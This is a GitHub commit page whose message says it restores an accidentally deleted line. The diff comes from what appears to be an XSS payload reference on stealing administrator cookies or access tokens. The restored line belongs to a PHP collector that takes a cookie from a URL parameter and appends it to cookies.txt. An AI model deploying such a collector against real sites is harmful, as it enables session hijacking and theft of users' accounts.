Fixed an oops

Somehow I deleted line 120 in a prior commit. Fixed.
This commit is contained in:
Cory Cline
2022-10-13 18:52:07 -05:00
committed by GitHub
parent 9ee8f092cd
commit fbed4254e5

View File

@@ -117,6 +117,7 @@ Obtains the administrator cookie or sensitive access token, the following payloa
Write the collected data into a file.
```php
<?php
$cookie = $_GET['c'];
$fp = fopen('cookies.txt', 'a+');